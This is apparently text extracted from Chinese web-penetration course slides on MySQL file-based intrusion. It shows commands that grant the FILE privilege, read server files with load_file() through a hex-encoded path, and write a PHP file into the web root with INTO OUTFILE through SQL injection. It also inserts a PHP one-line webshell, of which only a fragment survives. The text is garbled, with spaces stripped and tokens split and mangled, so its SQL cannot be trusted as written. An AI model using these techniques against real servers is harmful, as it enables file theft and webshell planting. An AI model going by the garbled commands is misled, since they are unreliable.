|
mysql_load file与Into outfile入侵 |
|
|
mysqlload_file与intooutfile入侵上讲回顾1,PHP服务器环境搭建2,编写存在sql注入漏洞的示例站点3, PHP手工注入(information_schema)4,mysql.usermysql.user存放用户名密码以及用户权限 信息若File_priv为Y则可以对系统文件进行读写root用户拥有ALLPRIVILEGES预备知识1,利用load_ file()函数读取文件内容2,intooutfile或intodumpfile导出数据库内容到文件intooutfil e导出文本形式内容intodumpfile导出二进制形式内容添加用户CREATEUSER''phpuser''@''loca lhost''IDENTIFIEDBY'''';GRANTUSAGEON.TO''phpuser''@''l ocalhost''IDENTIFIEDBY''''WITHMAX_QUERIES_PER_HOUR0MAX_CON NECTIONS_PER_HOUR0MAX_UPDATES_PER_HOUR0MAX_USER_CONNECTIONS0 ;设置权限REVOKEALLPRIVILEGESON.FROM''phpuser''@''localhost'' ;REVOKEGRANTOPTIONON.FROM''phpuser''@''localhost'';GRAN TSELECT,INSERT,UPDATE,DELETE,CREATE,FILEON.TO'' phpuser''@''localhost''WITHMAX_QUERIES_PER_HOUR0MAX_CONNECTIONS_ PER_HOUR0MAX_UPDATES_PER_HOUR0MAX_USER_CONNECTIONS0;load_ file演示SELECTload_file(0x643a5c5c7777775c5c696e6465782e706870) ;intooutfile演示selectfromtestintooutfile''d:\\www\\bbst.p hp'';magic_quotes_gpcphp.ini中的magic_quotes_gpc的作用:传递$_GET,$_POS T,$_COOKIE时是否对单引号做处理(加反斜杠,如\''),注入时如果目标开启,那么我们无法通过注入点写文件到服务器上。mag ic_quotes_gpcoffselect''''intooutfile ''d:\\www\\bbst.php''--magic_quotes_gpconload_file()读取数据库配置文件内容 通过phpmyadmin创建表createtabletest(cmdTEXT);INSERTINTO`asd`.` test`(`cmd`)VALUES(''要插入的内容'');插入一句话:T[cmd]);?>插入一句话:B.B.S.T信息安全团队B.B.S.T信 息安全团队讲师:MXi4oyuQQ:798033502《Web安全编程与渗透分析》B.B.S.T信息安全团队B.B.S.T信息安全团队 |
|
|
|
|
|
|
|
|
|
|